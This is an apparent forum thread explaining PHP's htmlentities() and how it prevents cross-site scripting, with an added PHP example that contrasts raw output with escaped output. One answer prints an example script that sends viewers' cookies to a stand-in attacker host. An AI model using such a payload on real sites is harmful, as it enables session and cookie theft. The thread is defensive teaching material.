Htmlentities... right.
Can somebody explain what it does actually?
Why do we need it? In what cases?
TIA
The HTML Entities Function
Turns anything that is a special HTML character into its entity. Entities are like HTML tags that cause HTML to be output "literally" to the browser, so that instead of <b>making text bold</b> you just get the bold HTML tag output plainly to the screen. It's useful for posting examples of HTML source, but it is also a security necessity against XSS (allowing other users to 'inject' HTML into your page).
An example of an HTML injection/XSS attack (cookie stealing):

Code:
<script language="JavaScript">
window.location('http://www.cookiestealers.com/stealthosecookies.php?c='.document.cookie);
</script>

Now if these forums did not use htmlentities (or a similar function), then http://www.cookiestealers.com would have the contents of the cookies from the viewers of this thread.
But because PHP's htmlentities() replaces '<' with '&lt;' and '>' with '&gt;' (less than and greater than respectively), the code becomes, as jshpro2 pointed out, literal.
There are other characters that are changed as well, " (double quote) for example.
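A worked example of what the answers above describe, added here and not taken from any post in this thread: the same untrusted string echoed raw and echoed through htmlentities(), in both an element body and a double-quoted attribute. The value of $untrusted and the helper name h() are constructed for the example.

```php
<?php
// Added example, not from the thread. $untrusted is constructed sample
// input of the kind a forum user might post; in a real application it
// would come from $_POST, a database row, and so on.
$untrusted = 'Hello <script>alert(document.cookie)</script> & "bye"';

// Escape a string for an HTML context. ENT_QUOTES converts both " and '
// (the pre-PHP-8.1 default ENT_COMPAT leaves ' alone, which matters in
// single-quoted attributes); ENT_SUBSTITUTE replaces invalid UTF-8
// sequences instead of making htmlentities() return an empty string.
function h(string $s): string
{
    return htmlentities($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// 1. Vulnerable: the raw string is interpolated into the markup, so the
//    browser parses the <script> tag and runs it for every viewer.
$vulnerable = "<p>$untrusted</p>";

// 2. Hardened: the same string is shown literally as text; the browser
//    renders "<script>" but never executes it.
$safe = '<p>' . h($untrusted) . '</p>';

// 3. Attribute context: without quote escaping the input could close the
//    value="..." attribute and start a new one; with h() it cannot, because
//    " becomes &quot;.
$safeAttr = '<input type="text" value="' . h($untrusted) . '">';

echo $vulnerable, "\n";
echo $safe, "\n";
echo $safeAttr, "\n";

// Sanity check: the escaped output must contain none of the characters
// that can change HTML structure in either context.
assert(strpbrk(h($untrusted), '<>"\'') === false);
```

The same flags apply to htmlspecialchars(), which escapes only the structural characters and is usually sufficient when the page is served as UTF-8.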